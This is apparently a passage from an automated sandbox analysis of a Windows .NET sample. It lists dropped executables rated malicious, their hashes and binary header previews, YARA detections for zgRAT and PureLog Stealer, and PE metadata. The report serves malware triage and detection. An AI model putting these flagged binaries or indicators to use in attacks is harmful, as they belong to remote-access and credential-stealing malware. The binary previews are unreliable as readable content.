                                                                                                                                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):342528
                                                                                                                                                                              Entropy (8bit):6.170134230759619
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\cscript.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\cscript.exe, Author: Joe Security
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                              Entropy (8bit):3.1725936297454367
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:FuQvIt3rz1XwaO+pwLsrqHxtY/2B9IcMkZ+tYcbI9SClcPEgJLs/wL28x:F7Yz1XDOYm1HjEkaTnt7bstIEgG/S28x
                                                                                                                                                                              MD5:5FD0ED53296876D4CEDC50D9791307A4
                                                                                                                                                                              SHA1:EA0980F05ABC2D710C443F289301404748333A07
                                                                                                                                                                              SHA-256:A91D5A2526FF83C9F94C784A1D70495812E3E89417F1B9D51B0DA178CED226DA
                                                                                                                                                                              SHA-512:E4FBED5E6AA3BCE9BF514B36CD7911D8C1A8A95456F0D22D5995F4833458334B0E0DA1CCA08AD5E4C1726F2215F01CAC5B2148B7CDA0C80DB56A2B9A48F75BB0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:....P...P.......................................P...!...................................O.Oo....................eJ..............Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............4@.............S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.4.0.8.0.1...0.4.5.7.2.3...6.4.2...1...e.t.l.......P.P.........O.Oo....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17126
                                                                                                                                                                              Entropy (8bit):7.3117215578334935
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                                                                                                                                                                              MD5:1B6460EE0273E97C251F7A67F49ACDB4
                                                                                                                                                                              SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                                                                                                                                                                              SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                                                                                                                                                                              SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):24490
                                                                                                                                                                              Entropy (8bit):7.629144636744632
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
                                                                                                                                                                              MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                                                                                                                                                                              SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                                                                                                                                                                              SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                                                                                                                                                                              SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):19826
                                                                                                                                                                              Entropy (8bit):7.454351722487538
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                                                                                                                                                                              MD5:455385A0D5098033A4C17F7B85593E6A
                                                                                                                                                                              SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                                                                                                                                                                              SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                                                                                                                                                                              SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):30005
                                                                                                                                                                              Entropy (8bit):7.7369400192915085
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                                                                                                                                                                              MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                                                                                                                                                                              SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                                                                                                                                                                              SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                                                                                                                                                                              SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1224
                                                                                                                                                                              Entropy (8bit):4.435108676655666
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4608
                                                                                                                                                                              Entropy (8bit):3.914120675277484
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:6+pLPt2M7Jt8Bs3FJsdcV4MKe271JTvqBHuOulajfqXSfbNtm:5PVPc+Vx9MvvkIcjRzNt
                                                                                                                                                                              MD5:972B3812327AE660D982DA00C88FA9E0
                                                                                                                                                                              SHA1:1C8E34C9D965636968491945C6BCB469BB50D274
                                                                                                                                                                              SHA-256:F4A0049A452EE58AB9394817C665A68C3B2B84FF178ED4F64F956B5FCA4894A3
                                                                                                                                                                              SHA-512:726976960765B3B1B146B4B9C5AA845560E729A8082393BCF97B3B677AF9EB161A30F91DA15CB558F870D865A1C33FB5B3D3E28EBEF0C0DF658305D660EFC0B5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...df.f............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.465718871195694
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:EIXfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZMMhA2gX4WABl0uNJdwBCswSby:5XD94fWlLZMM6YFHD+y
                                                                                                                                                                              MD5:D7A467191843EB20EFA2998DD39D5DE2
                                                                                                                                                                              SHA1:A95892BF2D77DB976F6C7AE7A0F0880C87CBE6CB
                                                                                                                                                                              SHA-256:B8C5F0BE2EE4B1D804E77037A5C861F3CF6F19508C3E6797974F85A2ECFAF861
                                                                                                                                                                              SHA-512:6D71DF3A902CFFC61803995E0BDF6751B1DBB4AE404D58C1D694F553F2071D8BDDFCCA94D8DB42D24EC6B0284AF08BC42A05D47A4492BCAF2BF0913E05915055
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.:|.................................................................................................................................................................................................................................................................................................................................................LCj.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.999982552411429
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:87Bym0x4Fy.exe
                                                                                                                                                                              File size:22'314'496 bytes
                                                                                                                                                                              MD5:7aa4185295ab3f4f896704aed05c0795
                                                                                                                                                                              SHA1:3ae4ec10990ff35a466328f1bc0e8ece616df3c3
                                                                                                                                                                              SHA256:cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
                                                                                                                                                                              SHA512:997ffd6fae8e72b7ca5c62f7de9a9a2c487580b0fec589d305c485163ff873539baa20c5791c3626403cf824a02ebf458c24e28236eae45a75461d1ba88a9e45
                                                                                                                                                                              SSDEEP:393216:jVymy1SvjN1GnU7s1/aRUFWYbyemyzgnfpyyxlj3OMddmZceVUJA9OhBI1Hs7:Em+SvZs+sldbzgRhFldmZceX9OP7
                                                                                                                                                                              TLSH:6727339BF9236CEAD5D6ACB01D1F4C016518F79158006EECA18CFEE5D7ACB0C6E16A70
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...cC.f.................tT.........>.T.. ....T...@.. ........................T...........@................................
                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                              Entrypoint:0x194923e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x669E4363 [Mon Jul 22 11:32:51 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x15491e40x57.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x154a0000x578.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x154c0000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
